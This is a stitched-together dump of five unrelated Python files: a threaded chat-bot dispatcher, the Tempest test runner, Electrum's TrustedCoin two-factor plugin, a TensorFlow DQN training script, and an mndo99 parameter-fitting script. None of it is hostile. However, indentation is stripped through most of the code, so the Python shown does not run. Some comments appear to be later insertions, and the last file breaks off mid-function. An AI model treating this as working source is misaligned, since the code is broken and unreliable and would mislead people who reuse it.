from threading import Thread, Lock
class Botal:
class _ThreadSafeGenerator:
def __init__(self, uuid, handler):
self.uuid = uuid
self._lock = Lock()
self._handler = handler(uuid)
next(self._handler)
def send(self, message):
with self._lock:
self._handler.send(message)
def __hash__(self):
return self.uuid
def __eq__(self, other):
            return self.uuid == other.uuid
def __init__(self, generator, uuid):
self._message_handler = None
self._error_handlers = []
self._mappings = {}
self.generator = generator
self.uuid = uuid
def _handle_message(self, user_id, message):
if user_id in self._mappings:
user = self._mappings[user_id]
else:
user = self._ThreadSafeGenerator(user_id, self._message_handler)
self._mappings[user_id] = user
try:
user.send(message)
except Exception as e:
del self._mappings[user_id]
for e_, f in self._error_handlers:
if isinstance(e, e_):
f(user_id, e)
break
else:
raise e
def handler(self, func):
self._message_handler = func
return func
def error_handler(self, error):
def decorator(func):
self._error_handlers.append((error, func))
return func
return decorator
def run(self):
def handle():
for event in self.generator:
uuid = self.uuid(event)
Thread(target=self._handle_message, args=[uuid, event], daemon=True).start()
assert self._message_handler
thread = Thread(target=handle, daemon=True)
thread.start()
thread.join()
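# Hedged usage sketch (the event stream and its shape are made up): Botal runs
# one generator-based handler per user and fans incoming events out to threads,
# so a minimal echo-style bot could look like this.
#
#   events = iter([{'user': 1, 'text': 'hi'}, {'user': 1, 'text': 'bye'}])
#   bot = Botal(events, uuid=lambda event: event['user'])
#
#   @bot.handler
#   def conversation(user_id):
#       while True:
#           event = yield  # each send() resumes here with the next event
#           print(user_id, event['text'])
#
#   bot.run()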
|
run.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Runs tempest tests
This command is used for running the tempest tests
Test Selection
==============
Tempest run has several options:
* **--regex/-r**: This is a selection regex like what testr uses. It will run
any tests that match on re.match() with the regex
* **--smoke**: Run all the tests tagged as smoke
There are also the **--blacklist-file** and **--whitelist-file** options that
let you pass a filepath to tempest run with the file format being a line
separated regex, with '#' used to signify the start of a comment on a line.
For example::
# Regex file
^regex1 # Match these tests
.*regex2 # Match those tests
The blacklist file will be used to construct a negative lookahead regex and
the whitelist file will simply OR all the regexes in the file. The whitelist
and blacklist file options are mutually exclusive so you can't use them
together. However, you can combine either with a normal regex or the *--smoke*
flag. When used with a blacklist file the generated regex will be combined to
something like::
^((?!black_regex1|black_regex2).)*$cli_regex1
When combined with a whitelist file all the regexes from the file and the CLI
regexes will be ORed.
You can also use the **--list-tests** option in conjunction with selection
arguments to list which tests will be run.
Test Execution
==============
There are several options to control how the tests are executed. By default
tempest will run in parallel with a worker for each CPU present on the machine.
If you want to adjust the number of workers use the **--concurrency** option
and if you want to run tests serially use **--serial**
Running with Workspaces
-----------------------
Tempest run enables you to run your tempest tests from any setup tempest
workspace it relies on you having setup a tempest workspace with either the
``tempest init`` or ``tempest workspace`` commands. Then using the
``--workspace`` CLI option you can specify which one of your workspaces you
want to run tempest from. Using this option you don't have to run Tempest
directly with you current working directory being the workspace, Tempest will
take care of managing everything to be executed from there.
Running from Anywhere
---------------------
Tempest run provides you with an option to execute tempest from anywhere on
your system. You are required to provide a config file in this case with the
``--config-file`` option. When run tempest will create a .testrepository
directory and a .testr.conf file in your current working directory. This way
you can use testr commands directly to inspect the state of the previous run.
Test Output
===========
By default tempest run's output to STDOUT will be generated using the
subunit-trace output filter. But, if you would prefer a subunit v2 stream be
output to STDOUT use the **--subunit** flag
"""
import io
import os
import sys
import threading
from cliff import command
from os_testr import regex_builder
from os_testr import subunit_trace
from testrepository.commands import run_argv
from tempest.cmd import init
from tempest.cmd import workspace
from tempest import config
CONF = config.CONF
class TempestRun(command.Command):
def _set_env(self, config_file=None):
if config_file:
CONF.set_config_path(os.path.abspath(config_file))
# NOTE(mtreinish): This is needed so that testr doesn't gobble up any
# stacktraces on failure.
if 'TESTR_PDB' in os.environ:
return
else:
os.environ["TESTR_PDB"] = ""
def _create_testrepository(self):
if not os.path.isdir('.testrepository'):
returncode = run_argv(['testr', 'init'], sys.stdin, sys.stdout,
sys.stderr)
if returncode:
sys.exit(returncode)
def _create_testr_conf(self):
top_level_path = os.path.dirname(os.path.dirname(__file__))
discover_path = os.path.join(top_level_path, 'test_discover')
file_contents = init.TESTR_CONF % (top_level_path, discover_path)
with open('.testr.conf', 'w+') as testr_conf_file:
testr_conf_file.write(file_contents)
def take_action(self, parsed_args):
returncode = 0
if parsed_args.config_file:
self._set_env(parsed_args.config_file)
else:
self._set_env()
# Workspace execution mode
if parsed_args.workspace:
workspace_mgr = workspace.WorkspaceManager(
parsed_args.workspace_path)
path = workspace_mgr.get_workspace(parsed_args.workspace)
os.chdir(path)
# NOTE(mtreinish): tempest init should create a .testrepository dir
# but since workspaces can be imported let's sanity check and
# ensure that one is created
self._create_testrepository()
# Local execution mode
elif os.path.isfile('.testr.conf'):
# If you're running in local execution mode and there is not a
# testrepository dir create one
self._create_testrepository()
# local execution with config file mode
elif parsed_args.config_file:
self._create_testr_conf()
self._create_testrepository()
else:
print("No .testr.conf file was found for local execution")
sys.exit(2)
regex = self._build_regex(parsed_args)
if parsed_args.list_tests:
argv = ['tempest', 'list-tests', regex]
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
options = self._build_options(parsed_args)
returncode = self._run(regex, options)
sys.exit(returncode)
def get_description(self):
return 'Run tempest'
def get_parser(self, prog_name):
parser = super(TempestRun, self).get_parser(prog_name)
parser = self._add_args(parser)
return parser
def _add_args(self, parser):
# workspace args
parser.add_argument('--workspace', default=None,
help='Name of tempest workspace to use for running'
' tests. You can see a list of workspaces '
'with tempest workspace list')
parser.add_argument('--workspace-path', default=None,
dest='workspace_path',
help="The path to the workspace file, the default "
"is ~/.tempest/workspace.yaml")
# Configuration flags
parser.add_argument('--config-file', default=None, dest='config_file',
help='Configuration file to run tempest with')
# test selection args
regex = parser.add_mutually_exclusive_group()
regex.add_argument('--smoke', action='store_true',
help="Run the smoke tests only")
regex.add_argument('--regex', '-r', default='',
help='A normal testr selection regex used to '
'specify a subset of tests to run')
list_selector = parser.add_mutually_exclusive_group()
list_selector.add_argument('--whitelist-file', '--whitelist_file',
help="Path to a whitelist file, this file "
"contains a separate regex on each "
"newline.")
list_selector.add_argument('--blacklist-file', '--blacklist_file',
help='Path to a blacklist file, this file '
'contains a separate regex exclude on '
'each newline')
# list only args
parser.add_argument('--list-tests', '-l', action='store_true',
help='List tests',
default=False)
# execution args
parser.add_argument('--concurrency', '-w',
help="The number of workers to use, defaults to "
"the number of cpus")
parallel = parser.add_mutually_exclusive_group()
parallel.add_argument('--parallel', dest='parallel',
action='store_true',
help='Run tests in parallel (this is the'
' default)')
parallel.add_argument('--serial', dest='parallel',
action='store_false',
help='Run tests serially')
# output args
parser.add_argument("--subunit", action='store_true',
help='Enable subunit v2 output')
parser.set_defaults(parallel=True)
return parser
def _build_regex(self, parsed_args):
regex = ''
if parsed_args.smoke:
regex = 'smoke'
elif parsed_args.regex:
regex = parsed_args.regex
if parsed_args.whitelist_file or parsed_args.blacklist_file:
regex = regex_builder.construct_regex(parsed_args.blacklist_file,
parsed_args.whitelist_file,
regex, False)
return regex
def _build_options(self, parsed_args):
options = []
if parsed_args.subunit:
options.append("--subunit")
if parsed_args.parallel:
options.append("--parallel")
if parsed_args.concurrency:
options.append("--concurrency=%s" % parsed_args.concurrency)
return options
def _run(self, regex, options):
returncode = 0
argv = ['tempest', 'run', regex] + options
if '--subunit' in options:
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
argv.append('--subunit')
stdin = io.StringIO()
stdout_r, stdout_w = os.pipe()
subunit_w = os.fdopen(stdout_w, 'wt')
subunit_r = os.fdopen(stdout_r)
returncodes = {}
def run_argv_thread():
returncodes['testr'] = run_argv(argv, stdin, subunit_w,
sys.stderr)
subunit_w.close()
run_thread = threading.Thread(target=run_argv_thread)
run_thread.start()
returncodes['subunit-trace'] = subunit_trace.trace(
subunit_r, sys.stdout, post_fails=True, print_failures=True)
run_thread.join()
subunit_r.close()
# python version of pipefail
if returncodes['testr']:
returncode = returncodes['testr']
elif returncodes['subunit-trace']:
returncode = returncodes['subunit-trace']
return returncode
|
qt.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import partial
import threading
import sys
import os
from typing import TYPE_CHECKING
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import (QTextEdit, QVBoxLayout, QLabel, QGridLayout, QHBoxLayout,
QRadioButton, QCheckBox, QLineEdit)
from electrum.gui.qt.util import (read_QIcon, WindowModalDialog, WaitingDialog, OkButton,
CancelButton, Buttons, icon_path, WWLabel, CloseButton)
from electrum.gui.qt.qrcodewidget import QRCodeWidget
from electrum.gui.qt.amountedit import AmountEdit
from electrum.gui.qt.main_window import StatusBarButton
from electrum.gui.qt.installwizard import InstallWizard
from electrum.i18n import _
from electrum.plugin import hook
from electrum.util import is_valid_email
from electrum.logging import Logger
from electrum.base_wizard import GoBack, UserCancelled
from .trustedcoin import TrustedCoinPlugin, server
if TYPE_CHECKING:
from electrum.gui.qt.main_window import ElectrumWindow
from electrum.wallet import Abstract_Wallet
class TOS(QTextEdit):
tos_signal = pyqtSignal()
error_signal = pyqtSignal(object)
class HandlerTwoFactor(QObject, Logger):
def __init__(self, plugin, window):
QObject.__init__(self)
self.plugin = plugin
self.window = window
Logger.__init__(self)
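    # Ask the user for their 2FA code and have the TrustedCoin server
    # co-sign the transaction asynchronously. Wallets that can sign without
    # the server, or where the x3/ keystore is not needed, are skipped.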
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.plugin.wallet_class):
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
window = self.window.top_level_window()
auth_code = self.plugin.auth_dialog(window)
WaitingDialog(parent=window,
message=_('Waiting for TrustedCoin server to sign transaction...'),
task=lambda: wallet.on_otp(tx, auth_code),
on_success=lambda *args: on_success(tx),
on_error=on_failure)
class Plugin(TrustedCoinPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
@hook
def load_wallet(self, wallet: 'Abstract_Wallet', window: 'ElectrumWindow'):
if not isinstance(wallet, self.wallet_class):
return
wallet.handler_2fa = HandlerTwoFactor(self, window)
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(read_QIcon("trustedcoin-status.png"),
_("TrustedCoin"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
        pw = AmountEdit(None, is_int=True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _('If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
wallet.handler_2fa.prompt_user_for_otp(wallet, tx, on_success, on_failure)
def waiting_dialog_for_billing_info(self, window, *, on_finished=None):
def task():
return self.request_billing_info(window.wallet, suppress_connection_error=False)
def on_error(exc_info):
e = exc_info[1]
window.show_error("{header}\n{exc}\n\n{tor}"
.format(header=_('Error getting TrustedCoin account info.'),
exc=repr(e),
tor=_('If you keep experiencing network problems, try using a Tor proxy.')))
return WaitingDialog(parent=window,
message=_('Requesting account info from TrustedCoin server...'),
task=task,
on_success=on_finished,
on_error=on_error)
@hook
def abort_send(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
self.waiting_dialog_for_billing_info(window)
return True
return False
def settings_dialog(self, window):
self.waiting_dialog_for_billing_info(window,
on_finished=partial(self.show_settings_dialog, window))
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("trustedcoin-status.png")))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>'\
+ _("For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _('TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay()
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:"%k), i, 0)
grid.addWidget(QLabel(window.format_amount(v/k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def go_online_dialog(self, wizard: InstallWizard):
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.reset_stack()
try:
            wizard.confirm_dialog(title='', message=msg, run_next=lambda x: wizard.run('accept_terms_of_use'))
except (GoBack, UserCancelled):
# user clicked 'Cancel' and decided to move wallet file manually
storage, db = wizard.create_storage(wizard.path)
raise
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
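        # Fetch the Terms of Service from the TrustedCoin server in a
        # background thread; results come back through the TOS widget's Qt
        # signals so the GUI thread stays responsive.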
def request_TOS():
try:
tos = server.get_terms_of_service()
except Exception as e:
self.logger.exception('Could not retrieve Terms of Service')
tos_e.error_signal.emit(_('Could not retrieve Terms of Service:')
+ '\n' + repr(e))
return
self.TOS = tos
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
next_button.setEnabled(tos_received and is_valid_email(email_e.text()))
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = threading.Thread(target=request_TOS)
t.daemon = True
t.start()
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
email = str(email_e.text())
self.create_remote_key(email, window)
def request_otp_dialog(self, window, short_id, otp_secret, xpub3):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
l = QLabel("Please scan the following QR code in Google Authenticator. You may as well use the following key: %s"%otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
        pw = AmountEdit(None, is_int=True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False, raise_on_cancel=False)
self.check_otp(window, short_id, otp_secret, xpub3, pw.get_amount(), cb_lost.isChecked())
|
train_model.py
|
import tensorflow as tf
from tf_agents.agents.dqn import dqn_agent
from tf_agents.environments import tf_py_environment
from tf_agents.networks import q_network
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.trajectories import trajectory
from tf_agents.utils import common
from environments.race_to_the_hot.env import race_to_the_hot
from tqdm import tqdm
import threading
import os
import json
from tf_agents.policies import policy_saver
from multiprocessing import Process
import time
# loading configuration...
print('loading configuration...')
_config = {}
with open('config.json') as f:
_config = json.load(f)
tf.compat.v1.enable_v2_behavior()
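# Hide all GPUs from TensorFlow so the environments and training run on CPU.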
tf.config.set_visible_devices([], 'GPU')
class master():
def __init__(self):
self.num_iterations = 20000000
self.initial_collect_steps = 10
self.collect_steps_per_iteration = 100
self.replay_buffer_max_length = 10000
self.batch_size = 64 * 10
self.learning_rate = 0.000001
self.train_steps = 1000
self.num_eval_episodes = 10
self.save_policy_dir = os.path.join(_config['files']['policy']['base_dir'],
_config['files']['policy']['save_policy']['dir'],
_config['files']['policy']['save_policy']['name'])
self.checkpoint_policy_dir = os.path.join(_config['files']['policy']['base_dir'],
_config['files']['policy']['checkpoint_policy']['dir'],
_config['files']['policy']['checkpoint_policy']['name'])
self.train_py_env = race_to_the_hot(window_name='Training')
self.eval_py_env = race_to_the_hot(window_name='Testing')
self.train_env = tf_py_environment.TFPyEnvironment(self.train_py_env)
self.eval_env = tf_py_environment.TFPyEnvironment(self.eval_py_env)
self.agent = None
self.replay_buffer = None
self.random_policy = None
self.train_checkpointer = None
self.tf_policy_saver = None
self.dataset = None
self.train_step_counter = None
self.iterator = None
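    # Build the Q-network and DQN agent, plus a random policy used for
    # exploratory data collection.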
def build_network(self):
_fc_layer_params = (512,)
_q_net = q_network.QNetwork(
self.train_env.observation_spec(),
self.train_env.action_spec(),
fc_layer_params=_fc_layer_params)
_optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)
self.train_step_counter = tf.Variable(0)
self.agent = dqn_agent.DqnAgent(
self.train_env.time_step_spec(),
self.train_env.action_spec(),
q_network=_q_net,
optimizer=_optimizer,
td_errors_loss_fn=common.element_wise_squared_loss,
train_step_counter=self.train_step_counter)
self.agent.initialize()
_eval_policy = self.agent.policy
_collect_policy = self.agent.collect_policy
self.random_policy = random_tf_policy.RandomTFPolicy(self.train_env.time_step_spec(),
self.train_env.action_spec())
self.agent.train_step_counter.assign(0)
def build_replay_buffer(self):
self.replay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=self.agent.collect_data_spec,
batch_size=self.train_env.batch_size,
max_length=self.replay_buffer_max_length)
self.dataset = self.replay_buffer.as_dataset(
num_parallel_calls=3,
sample_batch_size=self.batch_size,
num_steps=2).prefetch(3)
self.agent.train = common.function(self.agent.train)
        self.iterator = iter(self.dataset)
def save_checkpoint_init(self):
self.train_checkpointer = common.Checkpointer(
ckpt_dir=self.checkpoint_policy_dir,
max_to_keep=1,
agent=self.agent,
policy=self.agent.policy,
replay_buffer=self.replay_buffer,
global_step=self.train_step_counter
)
self.tf_policy_saver = policy_saver.PolicySaver(self.agent.policy)
def compute_avg_return(self, environment, policy, num_episodes=1000):
score = {'win': 0, 'loss': 0, 'timeout': 0}
total_return = 0.0
for _ in range(num_episodes):
time_step = environment.reset()
episode_return = 0.0
while not time_step.is_last():
action_step = policy.action(time_step)
time_step = environment.step(action_step.action)
episode_return += time_step.reward
total_return += episode_return
history = environment._env.envs[0].score_history
final_step = history[len(history) - 1]
if final_step == 'timeout':
score['timeout'] += 1
elif final_step == 'loss':
score['loss'] += 1
elif final_step == 'win':
score['win'] += 1
avg_return = total_return / num_episodes
return avg_return.numpy()[0], score
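    # Take a single environment step with the given policy and store the
    # resulting transition in the replay buffer.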
def collect_step(self, environment, policy, buffer):
time_step = environment.current_time_step()
action_step = policy.action(time_step)
next_time_step = environment.step(action_step.action)
traj = trajectory.from_transition(time_step, action_step, next_time_step)
buffer.add_batch(traj)
def collect_step_threaded(self, environment, policy, buffer):
p = Process(target=self.collect_step, args=(environment, policy, buffer,))
p.start()
def collect_data(self, env, policy, buffer, steps):
for _ in range(steps):
self.collect_step(env, policy, buffer)
    def perform_initial_collect(self):
self.compute_avg_return(self.eval_env, self.agent.policy, self.num_eval_episodes)
def perform_collection(self):
while True:
            for _ in tqdm(range(self.train_steps)):
                for _ in range(self.collect_steps_per_iteration):
self.collect_step(self.train_env, self.agent.collect_policy, self.replay_buffer)
def perform_training(self):
while True:
time.sleep(2)
try:
experience, unused_info = next(self.iterator)
train_loss = self.agent.train(experience).loss
            except Exception:
                # The replay buffer may not hold enough samples yet; skip
                # this round and retry after the next sleep.
                pass
def perform_testing(self):
while True:
time.sleep(5)
try:
avg_return, score = self.compute_avg_return(self.eval_env, self.agent.collect_policy)
print('Average Return = {0:.2f}, score {1}'.format(avg_return, score))
            except Exception:
                # Evaluation can fail before the agent has collected or
                # trained on any data; ignore and try again next cycle.
                pass
def perform_checkpoint_save(self):
while True:
time.sleep(300)
try:
self.train_checkpointer.save(self.train_step_counter)
print('checkpointed')
except Exception as ie:
print('failed checkpointer')
print(ie)
try:
self.tf_policy_saver.save(self.save_policy_dir)
print('saved')
except Exception as ie:
print('failed saver')
print(ie)
rtth = master()
rtth.build_network()
rtth.build_replay_buffer()
rtth.save_checkpoint_init()
restore_network = False
if restore_network:
rtth.train_checkpointer.initialize_or_restore()
print('initial collect...')
rtth.perform_initial_collect()
x = threading.Thread(target=rtth.perform_collection, args=())
x.start()
x = threading.Thread(target=rtth.perform_training, args=())
x.start()
x = threading.Thread(target=rtth.perform_checkpoint_save, args=())
x.start()
x = threading.Thread(target=rtth.perform_testing, args=())
x.start()
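# Note: collection, training, evaluation and checkpointing all run in
# separate threads that share the same agent and replay buffer. Nothing here
# takes explicit locks; the script appears to rely on the GIL and on coarse
# time.sleep() intervals to keep the threads from stepping on each other.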
|
fit.py
|
#!/usr/bin/env python2
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org>
import numpy as np
from scipy.optimize import minimize
from numpy.linalg import norm
import os
from copy import deepcopy
import threading
import subprocess
from matplotlib import pyplot
import time
import seaborn as sns
import pandas as pd
output1 = []
output2 = []
output3 = []
output4 = []
def task1():
global output1
cmd = ["./run_mndo99", "master1.inp"]
output1 = subprocess.check_output(cmd)
def task2():
global output2
cmd = ["./run_mndo99", "master2.inp"]
output2 = subprocess.check_output(cmd)
def task3():
global output3
cmd = ["./run_mndo99", "master3.inp"]
output3 = subprocess.check_output(cmd)
def task4():
global output4
cmd = ["./run_mndo99", "master4.inp"]
output4 = subprocess.check_output(cmd)
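# Run the four mndo99 master inputs concurrently and return their combined
# stdout; threads are sufficient here because the work happens in external
# subprocesses.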
def run_mndo99_nodisk():
t1 = threading.Thread(target=task1)
t2 = threading.Thread(target=task2)
t3 = threading.Thread(target=task3)
t4 = threading.Thread(target=task4)
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t2.join()
t3.join()
t4.join()
out = output1 + output2 + output3 + output4
return out
def parse_reference(filename):
energy = np.zeros((7174))
f = open(filename, "r")
lines = f.readlines()
f.close()
for line in lines:
tokens = line.split()
if len(tokens) == 2:
idx = int(tokens[0])
energy[idx] = float(tokens[1])
return energy
class Parameters:
def __init__(self, names, work_dir="."):
self.names = names
self.n = len(names)
self.work_dir = work_dir
self.reference_energy = parse_reference("dsgdb7ae2.xyz")
self.output1 = []
self.output2 = []
self.output3 = []
self.output4 = []
def write_fort14(self, params):
output = ""
for i in range(self.n):
if "ZP" in self.names[i]:
zp = self.names[i] + " " + str(params[i]) + "\n"
zs = "ZS"+zp[2:]
output += zs
output += zp
elif ("BETAP N" in self.names[i]) or ("BETAP O" in self.names[i]):
betap = self.names[i] + " " + str(params[i]) + "\n"
betas = "BETAS"+betap[5:]
output += betas
output += betap
else:
output += self.names[i] + " " + str(params[i]) + "\n"
f = open( self.work_dir + "/fort.14", "w")
f.write(output)
f.close()
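    # NOTE: this stub is shadowed by the full optimize() defined further down
    # in the class; Python keeps the later definition.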
def optimize(self):
return 0
def run_mndo99(self):
os.system("./compute.sh")
def get_energies(self, input_file):
f = open(input_file, "r")
lines = f.readlines()
f.close()
for line in lines:
if "SCF BINDING ENERGY" in line:
energy = float(line[25:42])
return energy
return 0.0 # Some dummy number
def parse_mndo(self):
energy = np.zeros((7174))
input_files = [f for f in os.listdir(self.work_dir) if f.endswith('.log')]
for input_file in input_files:
e = self.get_energies(self.work_dir + "/" + input_file)
idx = int(input_file[:4])
energy[idx] = e
return energy * 23.0609
def parse_master(self, filename):
f = open(filename, "r")
lines = f.readlines()
f.close()
energy = np.zeros((7174))
indexes = []
energies = []
for line in lines:
if "TITLE" in line:
tokens = line.split()
indexes.append(int(tokens[1]))
elif "SCF BINDING ENERGY" in line:
tokens = line.split()
energies.append(float(tokens[3]))
for i, idx in enumerate(indexes):
            energy[idx] = energies[i]
        # Assumed fix: the original fell through without a return; mirror
        # parse_mndo() and convert eV to kcal/mol before returning.
        return energy * 23.0609
def parse_master_precise(self, mndo_output):
lines = mndo_output.split("\n")
energy = np.zeros((7174))
mode = "begin"
e_scf = 0
e_nuc = 0
e_iso = 0
molid = 0
for i, line in enumerate(lines):
if mode == "enuc":
if "NUCLEAR ENERGY" in line:
e_nuc = float(line.split()[2])
energy[molid] = e_nuc + e_scf - e_iso
# print "SCF TOTAL ENERGY", e_nuc + e_scf - e_iso
mode = "begin"
if mode == "eisol":
if "TOTAL ENERGY OF THE ATOM (CALC)" in line:
tokens = line.split()
idx = int(tokens[0])
e = float(tokens[2])
eisol[idx] = e
if " nexmol=-1" in line:
tokens = lines[i-5].split()
e_scf = float(tokens[1])
e_iso = np.sum(atoms * eisol)
tokens = lines[i-1].split()
molid = int(tokens[1])
mode = "enuc"
if mode == "atoms":
tokens = line.split()
if len(tokens) == 5:
idx = int(tokens[1])
atoms[idx] += 1.0
if "****" in line:
mode = "eisol"
# print atoms
eisol = np.zeros((20))
if mode == "begin":
